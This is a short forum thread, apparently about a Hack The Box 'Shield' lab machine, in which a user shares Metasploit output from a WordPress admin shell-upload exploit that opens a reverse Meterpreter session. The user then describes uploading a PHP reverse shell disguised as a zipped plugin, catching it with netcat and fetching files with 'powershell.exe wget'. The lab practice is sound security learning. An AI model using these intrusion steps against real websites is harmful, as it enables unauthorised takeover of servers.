Starting Point - Shield

gally2000 · July 14, 2021, 8:34pm

I am stuck with metasploit, please someone help me to understand.

I tried to use metasploit to exploit wordpress, set username, password, rhost, lhost, lport. I have no firewall.

result:
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[] Started reverse TCP handler on 10.10.15.2:5555
[] Authenticating with WordPress using XXXXX:XXXXXXXX…
[+] Authenticated with WordPress
[] Preparing payload…
[] Uploading payload…
[] Executing the payload at /wordpress/wp-content/plugins/vMmslHvtlG/TiIhJauxas.php…
[] Sending stage (39282 bytes) to 10.10.10.29
[*] Meterpreter session 6 opened (10.10.15.2:5555 → 10.10.10.29:49803) at 2021-07-14 16:31:49 -0400
[!] This exploit may require manual cleanup of ‘TiIhJauxas.php’ on the target
[!] This exploit may require manual cleanup of ‘vMmslHvtlG.php’ on the target
[!] This exploit may require manual cleanup of ‘…/vMmslHvtlG’ on the target

meterpreter > sysinfo
[-] Error running command sysinfo: Rex::TimeoutError Operation timed out.
meterpreter > Interrupt: use the ‘exit’ command to quit
meterpreter >

Also after half a minute my sessions dies.

Don’t know what is happening.

gally2000 · July 15, 2021, 4:41pm

I would like to know what was the problem.

Meanwhile I tried manual method and it worked.

I’ve noticed the wordpress was asking to update to version 5.0, therefore it was older version.

I have uploaded php reverse shell that works on windows. It needed to be zipped and added banner to be recognized as plugin in wordpress.

got shell via netcat. Uploading file was needed to be done with “powershell.exe wget …etc”